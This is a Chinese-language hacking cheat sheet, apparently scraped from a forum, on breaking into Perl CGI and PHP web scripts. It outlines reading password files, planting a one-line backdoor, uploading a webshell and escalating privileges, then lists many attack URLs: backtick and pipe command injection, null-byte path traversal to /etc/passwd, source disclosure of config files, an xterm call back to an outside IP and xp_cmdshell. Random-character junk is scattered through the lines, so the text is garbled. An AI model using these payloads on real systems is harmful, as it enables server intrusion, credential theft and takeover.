总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 , n# p8 D; @. a, Z$ s4 d, i+ i
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
1 s G1 Z; D' Q感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
2 b5 ~( i" K: j+ e注“
- [3 T5 |* T" y3 _% _0 G( Hperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 . M. T$ W) K) d! T- k
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
( w- X& K- G- O( B& o% A6 G- {& c: E$ }1 K
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造 1 i7 _6 P& F* b, f6 f
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢 ' d) s) t8 K# C& o+ T) U
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号 & ?% e8 W0 @1 }: E7 o. X) E
http://target.com/cgi-bin/home/news/sub.pl?`id` & i2 d5 p/ }+ F6 \% y/ h
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` $ P4 {+ R( ~0 o5 _+ Y( ^ C
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示
' Q# {7 l8 E2 ^
, v/ L3 D# d0 c% k( Z6 O& Shttp://target.com/test.pl;ls|
& z0 K4 N% q8 W8 B1 j) E+ J3 Phttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| 0 E' [4 y% f; C4 ^6 E3 P
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|
+ W. V: f; z! W5 S3 fhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造
. |6 b( p2 d9 m$ T9 h比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。 ' E; ~" U w0 j5 I6 r9 J& Z
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection 8 d3 I, g' ]$ R. A: y2 A( N# W, s, O
- J7 ~8 D) X/ E" e @
http://target.com/test.pl?&........ /../../etc/passwd E& J2 K* ]% ` X: i# ~
; v6 r: {- P. W s
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./ 3 Y; K3 O% R# `4 c( j1 i$ L/ Y* I
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了
8 i9 I) W/ {5 ~) V8 Dhttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 2 k) y: B) d- T7 p
, h) k/ p3 @0 ^: l. s0 k8 R$ W
http://www.target.org/show.php?f ... /include/config.php 查看php代码 & K/ e! D6 {$ X k3 I
http://www.target.org/show.php?f ... ng/admin/global.php
0 B4 p5 P8 u; E/ x
7 y1 w* C8 r( b+ T7 c) e2 Demm和ps的一句话
6 T; J9 ~+ d% T2 |* x
/ b. v2 J& ^/ c) p# o: ]) m& Y& mhttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 9 i! k9 h7 l3 U7 z
+ X- v1 O, B2 N1 P( \8 z>bbb%20| ) {+ k6 w2 g4 x
/ V. C) u/ q$ A, F0 [4 T3 j9 Qhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串
+ i1 j! P& C0 R6 o3 Y
0 L* h1 b2 r' ~7 E4 y" L" whttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征 3 x. y5 w4 E( N, H s0 @: B1 M
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin
) I) T/ Z/ _1 G# _: }
/ p2 f6 @1 z% v/ R ~! z6 _9 u相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法
# J3 I# d* ~5 n9 @. _0 R; fhttp://target.com/index.html#cmd.exe 0 s) `3 ^5 f# L% O: _" E. J& |' U
http://target.com/index.html?dummyparam=xp_cmdshell
3 E1 Y) ?- U0 K& p! J. f* c( Qlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
8 M, G: f# y4 J# N9 v# M |